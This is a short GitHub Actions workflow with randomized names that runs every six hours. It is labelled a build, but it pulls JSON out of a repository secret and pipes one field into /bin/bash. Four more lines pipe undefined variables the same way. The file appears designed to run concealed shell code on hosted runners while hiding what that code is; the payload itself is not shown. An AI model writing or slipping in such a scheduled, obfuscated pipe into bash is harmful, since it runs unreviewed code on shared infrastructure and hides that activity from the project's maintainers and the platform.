name: huangjiao2314
on:
  workflow_dispatch:
  schedule:
    - cron: '38 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: huangjiao2314
        env:
          e433: ${{ secrets.e433 }}
        run: |
          echo $e433 | jq -r .wdnj57208 | /bin/bash
          echo $ya868 | jq -r .pkpi95214 | /bin/bash
          echo $kvye4 | jq -r .xoml6 | /bin/bash
          echo $rzyj61 | jq -r .zv64130 | /bin/bash
          echo $aelb3 | jq -r .unky53996 | /bin/bash

